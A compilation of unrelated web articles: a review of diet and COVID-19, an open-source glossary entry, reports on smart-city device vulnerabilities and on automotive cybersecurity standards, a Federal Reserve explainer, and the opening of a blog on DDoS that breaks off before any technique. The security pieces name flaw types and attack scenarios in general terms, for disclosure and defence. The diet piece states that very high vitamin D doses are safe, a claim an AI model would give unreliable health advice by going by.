The link between diet and the immune system is widely recognised, which is why its involvement in COVID-19 is receiving so much attention. A sufficient nutritional condition is necessary for the immune system to operate properly. This is strongly supported by data relating dietary deficits to immune system functioning.
Poor diet leads to weakened immune defences, which is usually related to lowered immunity and increased susceptibility to illness . In this respect, while there does not appear to be a treatment for COVID-19, healthy eating habits tend to improve immune system function and lead to a lower likelihood of COVID-19 infection and better recovery in those who have been infected .
This is especially essential given the healthcare overload caused by the epidemic, emphasising the importance of nutrition in the population’s overall health and immunological response.
Nutritional influence on reducing inflammation has been well documented and practiced whenever possible to reduce viral infection risks . This includes the promotion of a long-term proper diet and healthy lifestyle habits .
An anti-inflammatory diet to lessen the effects of inflammatory mediators could therefore be adjusted to impact or mitigate COVID-19 outcomes.
Until the spread of Sars-Cov-2 can be stopped and its lasting effects understood, the focus on nutritional interventions as a treatment strategy against its inflammatory properties will be of great potential. Indeed, nutrition plays a crucial role in the immune system, and its effects have been largely recognized , with studies showing COVID-19 patients with inadequate micronutrient levels resulted in longer periods of hospitalisations [33,34].
Similarly, a vast majority of hospitalised COVID-19 patients showed a general trend of at least one nutrient deficiency . Micronutrients such as vitamin C and D have long been considered to contribute to innate immune functions. By highlighting these aspects, coupled with their safety and ease of application, they may prove useful in influencing systemic markers of immune functions .
Therefore, methods that could increase the chances of early prevention and treatment should be thoroughly explored.
The Mediterranean diet is well known for its demonstrated ability in preventing cardiovascular diseases and type 2 diabetes mellitus and has been inversely related to respiratory diseases and inflammation [36,37]. The diet emphasises fruits and vegetables, legumes, olive oil intake, fish intake, and reduced meat consumption.
A well-balanced diet rich in these foods is linked with anti-inflammatory and immunomodulatory substances, such as essential vitamins and minerals [38,39]. Adherence to the diet has also demonstrated decreased PAF-induced platelet aggregation .
The diet is a significant source of bioactive polyphenols, which possess antioxidant, anti-inflammatory, and anti-thrombotic characteristics, demonstrating health-promoting benefits, particularly against cardiovascular diseases . In a large ecological study, adherence to a Mediterranean diet is negatively associated with COVID-19 infections and morbidity .
Furthermore, it is noted that following the diet reduces the length of stay and death in hospitalised patients over the age of 65 [43,44]. The Mediterranean diet, with its positive health benefits and properties, has been recommended by researchers as a viable treatment strategy for improving mortality and addressing both short-term and long-term conditions associated with COVID-19 infection and severity [21,25].
However, the complexity in investigating the link between dietary lifestyles and diseases is well established . Currently, a study is underway to comprehend and evaluate the effects of dietary habits on COVID-19 infection outcomes, specifically a Mediterranean diet versus a typical high-fat, sugar, and carb western diet (NCT04447144) .
Until then, more research is required to determine if the Mediterranean diet decreases the risk of COVID-19 and whether the chronic disease risk reduction linked with the Mediterranean diet reduces COVID-19 mortality.
A nutrient that has been put under the spotlight is vitamin D, with its sales in 2020 showing significant growth globally . Vitamin D, when consumed, exhibits many health benefits, boasting immune-enhancing effects and respiratory infection preventions, as well as revealing antiviral and anti-inflammatory effects that theoretically would be well-suited for the battle against COVID-19 [47,48,49].
Vitamin D minimises the production of the proinflammatory T-helper1, thereby resulting in decreased production of proinflammatory markers . In a meta-analysis, data revealed from two RCTs and one case-controlled study showed that patients given vitamin D supplementation required less ICU care, indicating a potential role for vitamin D in decreasing COVID-19 severity .
Likewise, vitamin D has shown capabilities in optimising long-term immunological effects that are generally associated with COVID-19 infections, such as persistent IL-6 elevation and prolonged interferon-gamma response . Similarly, COVID-19 patients have also been found to be more likely to have vitamin D deficiencies, with mortality rate shown to be higher in patients with vitamin D deficiencies compared to those without [53,54]. H
owever, the results should be interpreted carefully due to its large variances in sample size, dosage, and other limiting factors, as well as the uncertainty regarding the lack of vitamin D being a cause or consequence of COVID-19. Studies have also shown that potential therapeutic effects of vitamin D likely depend on a patient’s prior vitamin D status .
Further research is required before any determination can be made regarding the therapeutic effects of vitamin D against COVID-19. Therefore, for the general public, it is in their best interest to ensure adequate vitamin D consumption to prevent deficiencies. The recommended dietary allowance of vitamin D is 600–800 IU/day, with many researchers recommending much higher dosages of 5000 to 10,000 IU/day for long periods. Though the upper tolerable intake level for vitamin D is 4000 IU/day, long-term supplementation of vitamin D from 5000 to 50,000 IU/day has proven to be safe .
Vitamin C is a classical antioxidant that has long been associated with various immune-modulating effects, acting as a cofactor in a number of biosynthetic pathways and being involved in antibody production . Vitamin C accumulates in leukocytes and is rapidly used when an infection is present. Dietary vitamin C intakes show association with decreased inflammatory markers such as IL-6, TNF-α, and C-reactive proteins , as well as showed decreased markers of thrombosis in high-risk patients .
Clinical studies show increased anti-inflammatory cytokine IL-10 by blood mononuclear cells with a daily intake of 1 g/day of vitamin C . IL-10 works to inhibit and control IL-10 secretion through a feedback mechanism, critical in inflammation modulation in COVID-19.
A meta-analysis showed that through high-dose intravenous vitamin C infusions, the length of ICU stay can be shortened and the mortality rate significantly reduced .
Vitamin C may also prove beneficial in COVID-19 symptom progression from mild to severe, with vitamin C supplementations leading to decreased inflammatory markers as well as reduced mortality [60,61,62]. A trial is currently underway, involving 200 COVID-19 patients in a phase 2 interventional study of vitamin C supplements (NTC04395768) .
The vitamin shows promising immunomodulatory effects, however additional understanding of the biochemistry interaction of vitamin C with the COVID-19 virus is required. The recommended daily allowance of vitamin C for adults is 90 mg/day. While short-term use of vitamin C is safe, a consistent high dose of vitamin C may not significantly benefit healthy individuals and could cause adverse effects such as increased risk of oxalate kidney stones .
Fish oil, or more specifically omega-3 polyunsaturated fatty acids (PUFA), are well known for their various health benefits, such as improved cardiovascular functions and improved platelet effects [65,66]. Omega-3 PUFA has also shown anti-inflammatory characteristics, demonstrating a reduction in C-reactive proteins through dietary intake .
Most notably, omega-3 PUFA such as eicosapentaenoic acid (EPA) and docosahexaenoic acid (DHA) exhibit immense potential in anti-inflammatory properties through inhibition of proinflammatory cytokine synthesis and producing less inflammatory pro-resolving lipid mediator such as prostaglandins, thromboxanes, protectins, and resolvins [30,67].
Omega-3 fatty acids have also been shown to reduce thromboxane synthesis and PAF (platelet-activating factor) . The same PUFAs have also been studied for the potential in inactivating enveloped viruses through disruption of membrane integrity .
As Sars-CoV-2 uses angiotensin-converting enzyme 2 (ACE2) as the entry receptor, which is described to be present in lipid rafts, it is likely that omega-3 PUFAs could have the ability to regulate and disrupt the protein complex and lipid raft fluidity .
Furthermore, according to a Cochrane review and a meta-analysis, patients with acute respiratory distress syndromes who receive an omega-3 fatty acid-enriched diet or supplements exhibited a significant reduction in the length of ICU hospital stays, increase in blood oxygenation as well as a reduction in ventilation demand and organ failures [71,72].
With its anti-inflammatory and possible antiviral effects, coupled with reduced hospitalisation in studies, the intake of omega-3 PUFA may prove to be beneficial as a pharmaco nutrient in reducing the impact of inflammation caused by COVID-19. Recent studies have also shown beneficial impacts of omega-3 supplements [73,74] and proposed by others with great interest [67,70].
Furthermore, a study is currently underway (NCT04335032) )with the aim of studying the effects of EPA capsules on patients infected with confirmed Sars-CoV-2. However, despite the common portrayal of the inflammatory response, it is still essential for our immune system.
DHA and EPA may well reduce and impair host resistance and show potential negative cardiovascular effects with high omega-3 PUFA levels . This could prove counter-intuitive by increasing oxidative stress due to cellular membrane damage. Though many studies have demonstrated positive outcomes in terms of its anti-inflammatory effects on diseases, there needs to be more verification through clinical trials, and any supplementation intake must be performed with care.
Zinc is critical to the development of immune cells, with its deficiency causing changes in cytokine production and proinflammatory responses through monocytes, thereby increasing oxidative stress in zinc-deficient patients [77,78]. Zinc deficiency also results in decreased function in T-helper and cytotoxic T cells .
Similarly, dietary zinc supplements show a significant outcome in reduction in acute lower respiratory infection incidence, as well as shortened recovery times in children with respiratory diseases [80,81]. For its antiviral and anti-inflammatory properties, zinc has been claimed to play an immunomodulatory role against COVID-19 infections .
In an uncontrolled case series, the initiation of high doses of zinc supplements resulted in clinical symptomatic improvements in four patients . Despite this, many studies regarding the effectiveness of zinc against diseases or infections were not conclusive or consistent, demonstrating inadequate sample sizes or doses . The adverse effects of high zinc dosage should also be considered, especially for those infected.
According to current studies, supplementation with several micronutrients may be beneficial in both the prevention and management of COVID-19 infection. Particular emphasis should be directed to vitamin C and vitamin D, as they play a key role in immune response control, with the goal of minimising infection risk while also enhancing the health of COVID-19 patients.
Vitamin C has been shown to aid in the prevention and treatment of viral infections via a variety of primarily indirect processes, while vitamin D has been shown to have direct antiviral capabilities. Diets such as the Mediterranean diet, characterised by its high intakes of grain, fruit, and vegetables, and moderate intake of fish and dairy, are advised for adequate intake of micronutrients and bioactive compounds. Even if certain dietary supplements or therapies are thought to be beneficial for the prevention and recovery of COVID-19 patients, strong data from randomised clinical studies are still needed to back up these claims.
The long-term observation of COVID-19 patient recovery should also be established to study the severe and non-severe patient nutrition. | <urn:uuid:d4db72e0-a47c-4a1c-baa3-be3e8b5e6070> | CC-MAIN-2022-40 | https://debuglies.com/2021/11/04/anti-inflammatory-diets-comprising-of-mediterranean-cuisine-vitamins-c-d-omega-3-fatty-acids-and-zinc-helps-in-covid-19-specially-in-terms-of-preventing-disease-severity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00741.warc.gz | en | 0.941619 | 3,301 | 3.515625 | 4 |
Open source refers to any software program that has a source code available to the public to use, share, and modify however they want. This could mean fixing bugs, improving software, or adapting it to meet specific needs. Open source technology opens the door for collaboration and the emergence of new models of software.
A program can only be labeled ‘open-source’ if it meets the standards set by ‘The Open-source Document’ which determines whether a software license can be given the open-source certification mark. This document was created by the ‘Open-source Initiative’, the corporation which monitors anything and everything related to open-source software.
With regards to artificial intelligence (AI), AI systems for problem solving, including Cognitive Computing systems, require a base collection of knowledge or corpus. Open source projects like WordNet, which catalogs words, synsets, and senses in English, can give application developers a jumpstart on building robust solutions with natural language capabilities. The same rings true for machine learning (ML), where the majority of ML libraries are available from the open source community (largely via The Apache Software Foundation). | <urn:uuid:626f3141-ad50-4241-9da6-3301d8e608dc> | CC-MAIN-2022-40 | https://aragonresearch.com/glossary-open-source/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00741.warc.gz | en | 0.903826 | 234 | 3.453125 | 3 |
Earlier this year, many residents in Hawaii were thrown into a temporary state of panic following an emergency alert on their mobile devices warning about an incoming ballistic missile.
The warning turned out to be the result of human error. But new research from IBM X-Force Red and Threatcare shows it would take little in the future for cyberattackers to deliberately cause widespread panic by triggering false alerts about catastrophic events, such as floods and radiation exposure.
Security researchers from the two firms recently tested multiple so-called smart city products deployed in a growing number of cities for uses like traffic management, monitoring air quality, and disaster detection and response.
In this case, the tested systems fell into three broad categories: industrial IoT, intelligent transportation systems, and disaster management devices. The products included those used for warning planners about water levels in dams, radiation levels near nuclear plants, and traffic conditions on highways.
The exercise unearthed 17 zero-day vulnerabilities, eight of them critical, in four smart city products from three vendors — Libelium, Echelon, and Battelle. Using common search engines like Shodan and Censys, the IBM and Threatcare researchers were able to discover between dozens and hundreds of these vulnerable devices exposed to Internet access.
With relatively little effort, they were also able to determine, in many cases, the entities using the devices and the purpose for which they were using it. For instance, they were able to identify an entity in Europe using smart devices to monitor for radiation levels and a major US city using smart sensors to keep track of traffic conditions. The research discovered the vulnerable devices deployed across major US and European cities and in other regions of the world.
All three vendors have since patched the vulnerabilities or issued software updates, and so have the entities that were identified as using the vulnerable products.
In a report this week, Daniel Crowley, research director of IBM's X-Force Red, described the results as "disturbing."
"According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic," he said.
The researchers, for instance, found that an attacker could use vulnerabilities of the sort identified in their report to manipulate water sensors in such a manner as to report flooding in an area when there is none. More dangerously, the attacker could also manipulate the sensors and silence warnings of an actual flood event causing by natural or human causes.
Similarly, the researchers found that attackers could exploit the vulnerabilities to trigger a false radiation alarm in areas surrounding a nuclear plant. "The resulting panic among civilians would be heightened due to the relatively invisible nature of radiation and the difficulty in confirming danger," Crowley said.
Another scenario that presented itself during the research was of attackers manipulating remote traffic light sensors, causing traffic gridlock on a massive scale.
Troublingly, most of the vulnerabilities that IBM and Threatcare unearthed were of the easily discoverable kind, meaning the researchers had to put little effort into finding them. "While we were prepared to dig deep to find vulnerabilities, our initial testing yielded some of the most common security issues," Crowely said.
Examples included default passwords, hardcoded admin accounts, SQL injection errors, flaws that allowed authentication bypass, and plaintext passwords. The research showed that many smart cities are already exposed to threats that are well-understood and should have long ago been mitigated, he said.
The results of the IBM and Threatcare study are another confirmation of the security issues posed by the growing adoption of smart city technologies worldwide. Organizations such as Gartner have predicted that over the next few years, cities will connect many billions of devices to the Internet for a wide range of use cases, greatly expanding the attack surface in the process.
A global survey of smart city security issues by ISACA earlier this year showed many are especially concerned about attacks targeting energy and communication sectors. Sixty-seven percent said they believe that nation-state actors present the biggest threat to smart-city infrastructure, and only 15% consider cities to be well-equipped to deal with the threat. The survey also showed that a majority (55%) thought the national government is best-equipped to deal with smart city cybersecurity threats. | <urn:uuid:4a133065-f7eb-4aef-8127-8cc4faefa513> | CC-MAIN-2022-40 | https://www.darkreading.com/vulnerabilities-threats/vulnerable-smart-city-devices-can-be-exploited-to-cause-panic-chaos | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00741.warc.gz | en | 0.961732 | 872 | 2.875 | 3 |
Recent advances in the manufacturing of autonomous vehicles, connected vehicles and electric vehicles (EVs) has made vehicle architecture more complex. The increasingly sophisticated integration of software in vehicles is creating an opening for cyber attackers to cause malfunctions. For example, the recent Jeep hack was executed in a controlled environment in which the integration of software made the vehicle vulnerable to cyberattacks. Similarly, a disgruntled employee in an automotive manufacturing company in Texas remotely disabled hundreds of cars by disrupting the functioning of a connected vehicle platform. Since digital capabilities are critical to connected cars, cyber criminals are even interfering with the working of car door locks, headlights, sunroofs and other components. A recent attack was executed through the Wi-Fi system of a vehicle, allowing the attacker to control lights, disable alarms and unlock doors. Another area that is vulnerable to attacks is the passenger car unit (PCU) that can be exploited for identity theft through a data center compromise.
A focus on cybersecurity is increasingly critical to ensure the necessary measures are in place to prevent attacks throughout the lifecycle of a vehicle. This means securing the production process beyond the development lifecycle. Project-specific cybersecurity management should begin with a cybersecurity assessment to determine if security requirements are implemented at the vehicle level or a component level.
Next-generation automotive manufacturers tend to integrate a number of third-party solutions, often from niche technology vendors or start-ups. These solutions often align with four pillars of mobility: autonomous, connected, electric and shared. These are sometimes referred to as ACES. Standards such as ISO 21434 neutralize cybersecurity vulnerabilities associated with these external components under the parameters for distributed cybersecurity activities. These parameters apply to the supplier/vendor capabilities, which leads to a more streamlined process for selecting solutions and aligning responsibilities for the overall vehicle security.
Overview of the standards
ISO 21434 and WP.29 are the standards used to secure connected vehicles. The draft version of ISO 21434 was launched in February 2020, and the final version is expected in Q3 2021. ISO 21434 defines standards for new vehicle types launched by OEMs from Q3 2022 and for any new vehicle from Q3 2024. The WP.29 is primarily enforced in Europe; the draft, which was released in June 2020, specifies requirements for all connected vehicles around mitigating cybersecurity risks from the beginning to the end of the lifecycle of any auto model. The two industry standards overlap significantly in their mandates to monitor, detect and respond to cyber threats, each providing relevant data to support the analysis of an attempted or a successful cyberattack. The data supports an audit mechanism or a login mechanism, enabling a cybersecurity analyst to investigate and understand the methodology related to a particular incident.
Under these new guidelines, organizations in the automotive and transportation ecosystems would need to create a cybersecurity management system (CSMS), defining policies and procedures. The CSMS details, along with all evidence and auditable references, would need to be produced during the approval of a vehicle type. The guidelines ensure that procedures are in place for an identified risk and are not limited to a particular vehicle type. This is followed by testing the cybersecurity infrastructure for a vehicle type, which includes penetration testing, fuzzing and security assessment across the ECU level, PCU level, infotainment level, communication level, and the vehicle in general.
It is necessary to plan the proper test cases. Continuously assess the durability of the protection. With the evolving nature and increasing sophistication of cyberattacks, the built-in security control for a present-day vehicle may not be adequate.
An organization needs to have a strategy to monitor the common vulnerabilities and exposures (CVE) database and stay updated on the evolving cyber threat landscape. It also needs to undertake a thorough analysis to identify if a vehicle might be vulnerable to new types of cyberattacks and find ways of mitigating the threats. Mitigation activities, such as creating relevant patches and upgrading patches, should be streamlined to adhere to the regulations.
Adherence to regulations by OEMs and suppliers to prevent cyberattacks
As stated earlier, the guidelines – as defined under ISO 21434 and WP.29 – overlap, compelling OEMs and Tier 1 suppliers to reexamine their cybersecurity strategies to span development and postproduction phases. ISO 21434 does not address security on a component or project level alone; it addresses cybersecurity as a part of an organization’s culture.
Managing project-specific cybersecurity (security for a specific vehicle type) should include design, development, testing, production and post-production phases. The regulations also encompass risk assessment. A focus on cybersecurity at the concept or design levels helps the product engineering phase address threat mitigation. Also, the regulations make sure the responsibility of cybersecurity is shared by suppliers as well. As a result, OEMs need to ensure the components sourced from a supplier are compliant with ISO 21434 and are in keeping with the overall security management of a complete vehicle.
The WP.29, on the other hand, encompasses four major areas: 1) managing vehicle cyber risks, 2) detecting and responding to a post-production security incident, 3) mitigating risks along the value chain by adopting secure-by-design concept (engaging suppliers), and 4) providing safe and secure over-the-air (OTA) updates. The four areas need to be addressed along two lines: first, by defining policies and procedures for organizations to follow with a CSMS; and second, by undertaking assessment and categorization of a risk once it is identified. At the project level, adherence to WP.29 needs to be specified for a manufacturer across areas such as risk assessment at a component level, and then scaled up.
Cybersecurity in product engineering, manufacturing engineering and post-production activities
ISO 21434 is gradually becoming integral to the V-cycle of vehicle development ― relevant from the vehicle conceptualization phase, throughout the validation phase, to adherence to cybersecurity concepts and requirements. ISO 21434 defines cybersecurity goals across the vehicle production lifecycle ― concept design, architecture design, hardware and software architecture definition and design requirement ― simultaneously validating each and every step. Finally, the process is concluded with thorough penetration testing, fuzzing and vulnerability assessment.
The WP.29 guideline spans the post-development phases as well ― the cyber defense mechanism for a vehicle post launch must be addressed during the development and planning phase. Such measures would cover loopholes, such as a compromise to keys that are punched, vulnerabilities around operations and maintenance processes and sophisticated threats. The WP.29 focuses on a number of distributed activities, including how an enterprise evaluates supplier capabilities, aligns responsibilities and adheres to guidelines. Once a component is delivered, the OEM receives guidance on how the supplier audited, tested and standardized the component. Furthermore, the standard also addresses how to decommission a particular vehicle or component.
Mandating a detailed and secure OTA/SOTA mechanism
The WP.29 mandates a detailed process for software updates, particularly an OTA upgrade, that every OEM must follow with the help of a software update management system (SUMS) for vehicles on the road. The SUMS must be secured, thoroughly tested and managed to prevent breaches or attacks. Also, the delivery mechanism of an OTA upgrade package has to be secure, with the OEM ensuring the integrity and authenticity of the package being sent. As the OTA package is encrypted, signed and encoded prior to sending it to a vehicle or component, it assures an additional layer of security. Then the package is decoded, the signature validated, the file decrypted, and finally the decrypted file handed over to the update manager. The software identification number has to be protected and a mechanism for reading that from the data should be put in place by the OEM.
WP.29 has adopted a structured methodology around CSMS OTA and has mandated that vehicle manufacturers follow five parameters:
- Identify and mitigate supplier-related risks through a cybersecurity risk assessment and mitigation framework
- Possess detailed risk assessment and mitigation strategy with demonstrable test results
- Produce design and the corresponding design process for a particular vehicle type
- Maintain data forensic capabilities across post-production activities that showcase the way a vehicle is monitored, vulnerabilities are detected, and protection is ensured against cyberattacks
- Formulate measures to detect and respond to a specific cyberattack associated with a particular vehicle, the backend system or the complete ecosystem.
The WP.29 looks at a few other areas as well, such as managing software updates, informing a user about an update or the availability of the update, ensuring the availability of sufficient power to complete the update and the capability of a vehicle to conduct the update. It also covers how to safely execute an update, including a rollback mechanism if an update fails.
Overlap between standards and the role of system integrators
A number of systems integrators such as LTTS have created frameworks to draw similarities between WP.29 and ISO 21434 to help OEMs and Tier 1 suppliers adhere to the standards. For example, LTTS has identified eight areas of WP.29 that can be mapped to various processes and clauses of ISO 21434 ― covering everything from organization-wide cybersecurity to a security as it relates to a particular vehicle type. It encompasses the processes for monitoring, detecting and responding to cyberthreats and the processes needed to capture relevant data to support the analysis of security breaches.
Systems integrators first tend to analyze the threat landscape for a vehicle model or the specific component they are going to develop for a client. A thorough threat assessment and risk analysis should help create a mitigation strategy, architecture and high- and low-level design (HLD and LLD). For cases in which the component development is already in progress and security is not included in the scope, systems integrators carry out a gap analysis after performing threat assessment and risk analysis (TARA). This is followed by the definition phase, in which the framework and processes are defined, along with the training of the engineers and the process is piloted and refined to adhere to organizational requirements. Finally, the processes are implemented as a part of product engineering.
Most of the global systems integrators have been working with automotive OEMs and Tier 1s for decades and can be expected to streamline the roll out of the process with the required training. A rich experience in engineering and R&D services is required to measure the process and analyze potential threats and provide implementation and validation support for cybersecurity. This involves laying out various sub-processes for a component or a vehicle type, such as TARA, HLD, LLD, architecture design, product process, post-production strategy and supplier and product validation strategy.
The biggest existing challenge when it comes to cybersecurity in connected mobility is the lack of awareness about the nuances of the ISO 21434 and WP.29 standards. A number of important market participants across the global automotive value chain are not aware of the regulatory standards or the possibilities for ensuring adherence among their suppliers. This creates a whitespace of opportunities for systems integrators and consulting companies that can step in to ensure this adherence and enable enterprises to define their cybersecurity policies and validate them. The value proposition would be simplified and comprehensive cybersecurity plans for OEMs.
ISG notes that several Tier 1 suppliers are confused by the actions of OEMs tightening their policies regarding compliance to ISO 21434 and WP.29. For instance, vehicle infrastructure components such as wireless chargers, if hacked, can compromise multiple critical components. This is compelling OEMs to ensure these components comply with the security guidelines under the relevant standards.
Threat assessment and risk analysis is another area of heightened significance. Suppliers need the capability to design complete security systems – including defining a cybersecurity plan, TARA, component-specific security and cybersecurity specifications – so they can offer vulnerability assessments that span software/hardware and system level architecture design and the overarching product engineering. Providers have an opportunity to grow their cybersecurity plans to cover security verification and validation, production and control, and post-production.
A number of next-generation automotive cybersecurity technology suppliers have emerged around the world, providing agentless, cloud-based solutions with proprietary data analytics platforms. These companies, such as Israel-based Upstream, also are exploring possibilities with other enterprise segments such as insurance. With the availability of fleet, telematics and consumer data, these companies can engage analytics engines to pinpoint the most appropriate automobile insurance policies for the end-user.
As a part of the upcoming study, Manufacturing Industry Services 2021, ISG Provider Lens analyzes this space from a product perspective. The study analyzes product and solution vendors from across the mobility security market on their ability to provide threat analysis to enterprises and components such as advanced driver-assistance systems (ADAS), ECUs and EV battery systems to OEMs and Tier 1 suppliers.
About the author
Avimanyu is a Lead Analyst (Research) in ISG India operations, bringing over 10 years of experience in market research and consulting. At ISG, Avi’s focus is on the disruptive technologies and innovations pertaining to enterprise networks and engineering and R&D practices. | <urn:uuid:12a0816a-c0a6-4fd3-a86c-98530634c383> | CC-MAIN-2022-40 | https://isg-one.com/articles/cybersecurity-concerns-in-connected-mobility-a-panacea-for-the-recovering-automotive-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00741.warc.gz | en | 0.936922 | 2,660 | 2.578125 | 3 |
Central banks hold the reins of monetary policy and regulate the national financial systems. The origin of the central banking system dates back to the advent of The Federal Reserve System which today serves as the most elaborate framework of checks and balances to maintain equilibrium and financial stability amongst all central banks.
This blog explores the structure of the Federal Reserve, establishes its role and then explores the various ways in which the Federal Reserve fulfils its duty towards the stability of the United States economy and essentially, the world economy.
Structure of the Federal Reserve
The establishment of the system dates back to The Federal Reserve Act which was signed by President Woodrow Wilson into law on December 23, 1913. The Act wrote into law a system aimed at diffusing power between regulators and government by the establishment of three components of the system:
The President of the United States nominates the members of the Board of Governors and they are approved by the US Senate. The FOMC is in charge of setting national monetary policy. The decisions of the FOMC affect the cost and availability of borrowers' credit and the returns received by savers. It decides on the operation of free-market practices and the setting of the policy interest rate, the federal funds rate.
(Suggested blog: What is SEBI? Structure & Functions)
Role of the Federal Reserve
The Federal Reserve is accountable to the U.S. Congress and the public and to ensure financial accountability, the financial statements and annual reports of the Federal Reserve Banks and the Board of Governors are audited annually by an independent, outside auditor.
Though a case can be made for both sides: for and against the independence of the Federal Reserve, the elaborate framework along with an independent revenue stream ensures both the instrumental and goal independence of the Fed.
In essence, the goal of the Federal Reserve is to manage monetary policy maintaining a state of financial stability in the economy by ensuring stable prices, minimum unemployment level and moderate interest level in the economy.
All of these goals entail maintaining a sense of confidence in the economy and its constituents by providing sufficient liquidity while ensuring the solvency of the financial system through regulation of the banks guiding a sufficient capital level.
Although employment and inflation form the dual mandate of most central banks - the goals of some Central Banks may differ according to the respective macroeconomic issues faced by the nations.
(Also read: Microeconomics vs macroeconomics)
Federal Reserve’s Working Approach
Now that the role of the Federal Reserve is established, this section explores the various tools used by the Federal Reserve in fulfilling its responsibility towards the United States and the whole world.
The quintessential weapon to get a handle on all these seemingly unlinked variables is the fund rate - which guides the prime rate i.e. the inter-bank lending rate which in turn shall pass through the entire cycle of interest rates built one over the other. The fund rate is based upon the Fed’s outlook on inflation and unemployment levels in the economy.
In case of a slowdown in economic activity, the Fed can reduce the interest rate guidance which shall, in turn, be taken up (and usually is) by the leading banks who will then adjust their inter-bank lending rates downwards.
In effect, this shall reduce the cost of funds for the banking system leading to a reduction in lending rates to corporate and retail customers, while at the same time reducing the interest rate on deposits in order to match the reduction in the prime rate. Overall, this implies that people shall get a lower interest on their deposits and will get cheaper loans at the same time.
For individuals, this leads to an increase in spending and eventual flow of money parked in term banking products to the financial markets as they become a more lucrative option for gaining returns.
(Must catch: What are RBI bonds and their features?)
For corporates, this leads to a spur in growth on the back of a lower cost of credit.
Both these actions on the part of people and corporations lead to a rise in economic activity, creating jobs and spurring back the engine of the growth, heralding the economy into an expansionary phase.
This stance of Fed where it reduces interest rates is called “accommodative”, currently due to the slowdown inflicted by the pandemic of Covid19 – Fed stands with an accommodative stance and has committed to near-zero interest rates for the medium term, which has helped to stabilize the global equity markets and has led to easier availability of credit to the ailing corporates.
It took the same stance post the slowdown inflicted after the Y2K crisis where it similarly held low-interest rates until 2003, but this led to an unrestrained flow of credit to individuals and corporates which was essentially unsustainable in nature driving up inflation. So, Alan Greenspan, the Chair of the Federal Reserve, then, had taken steps to cut down excess liquidity in the market increasing the fund rate.
Credit had already been doled out on a rather loose set of checks and balances by banks and financial products without proper due diligence had been sold to institutional investors and banks. In turn, all of this led to the global financial crisis of 2008, where borrowers started defaulting on their mortgages due to rather high-interest payments and credit default swaps started exploding, risking the entire financial system.
Therefore, the key to sustainable development lies in balancing the growth cycles through necessary interventions in the credit market thereby providing a stable growth environment to the economic constituents. Hence, the current policy of the Fed is to maintain close to 2% inflation in the long term so steady growth can be achieved.
Investors have historically shown a preference for lower volatility in the growth cycles of economies to hold investments within nations – and hence, stable returns are more valued by investors globally rather than higher yet unsustainable and riskier ones. In order to provide guidance, the Fed also comes out with a target fund rate in order to provide a stable and transparent outlook to all market participants.
The guidance provided by Fed helps individuals and corporations to plan their financial decisions and provides a stable outlook on both interest rates based upon Fed’s estimate on inflation.
(Suggested blog: What is Credit Rating?)
Open Market Operations
Though the federal fund rate changes govern the prime lending rate in the market – this is not a frequent tool applied by the Fed.
In order to maintain the prime rate within the targeted range, another powerful tool in the Fed’s hand is open market operations, where Fed purchases government securities held indirectly by banks in the open market in order to hit a target fund rate.
In essence, this governs the supply of reserves in the banking system, thereby affecting interest rate changes. In case the Fed wants to bring down the effective prime rate, it will buy government securities through the open market operations, run through the New York Fed trading desk, thereby injecting money into the banks, which in turn shall be given out at a lower rate due to demand-supply dynamics in the market, in order to maximise treasury income for the banks.
Federal Funds Rate:
The federal funds rate refers to the interest rate that banks charge other banks for lending to them excess cash from their reserve balances on an overnight basis.
By law, banks must maintain a reserve equal to a certain percentage of their deposits in an account at a Federal Reserve bank. The amount of money a bank must keep in its Fed account is known as a reserve requirement and is based on a percentage of the bank's total deposits.
In response to the Covid-19 crisis, the Federal Reserve has cut its goal for the Federal Funds rate by 1.5% since March last year. Currently, the fed funds rate is at the 0% to 0.25% range, as described by brookings.edu.
The forward guidance provided by the Federal Reserve reaffirms its accommodative stance and provides confidence to entities worldwide. The Federal Reserve’s affirmative forward guidance puts downward pressure on the long-term rates.
Quantitative easing is done by the Federal Reserve by purchasing massive amounts of securities and thereby infusing liquidity into the financial system. The Federal Reserve has made no policy changes regarding the $120 billion per month cash infusion programme currently in place in the latest FOMC meeting held last month.
Apart from the weapons discussed above, the Federal Reserve employs lending facilities to securities firms at low rates, expands the scope of its repo agreements, reduces the reserve requirements, provides special credit facilities to support loans to small businesses, etc. to revive the economy in a holistic manner.
In response to Covid-19, one of the most daunting challenges faced by the Fed where the lockdowns imposed onto the market derided economic activity while investor confidence tumbled as the pundits forecasted the work economy to enter into a long-term recession, Fed used all the weapons in their arsenal from the fund rate, OMO to liquidity facilities, swap lines and reserve requirements.
(Must read: Types of bonds)
In order to reinforce confidence in global markets, the Fed reserve went so far as to provide Central banks and other international monetary authorities with accounts at the Federal Reserve Bank of New York and extended repurchase facilities to them, in effect, providing unprecedented amounts of liquidity to the global markets backstopping the risk faced by investors who were pulling away money from the markets.
All in all, the Federal Reserve’s major goal is to provide financial stability to the economy and it accomplishes the same through an array of weapons at its disposal. The intended purpose to establish the Federal Reserve System was to augur a stable economic development path for the US, but with an unprecedented scale of globalization through the past few decades, it has become the bearer of one of the most important guiding lights to the international credit markets.
As Covid has helped us understand, the Federal Reserve plays an important role in stabilizing the world economy to a significant level. | <urn:uuid:fad17462-42d6-4035-aa74-71efbcaf18c8> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/federal-reserve-its-working-mechanism | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00741.warc.gz | en | 0.949795 | 2,046 | 3.984375 | 4 |
How to DDoS Like an Ethical Hacker
Of course, this isn’t something you should try at home.
You’ve just arrived home after a long work day, so long in fact that night has already set in. You wander a bit through the darkness, turn on the lights, grab two slices of bread, and put them into that old, creaking toaster. It’s nothing fancy, just a quick and dirty snack until you undress, unwind and cook a proper dish.
The moment you push down on the button to toast the bread, you hear a loud pop, and all of the lights suddenly go out.
“Damn, the fuse blew up.”
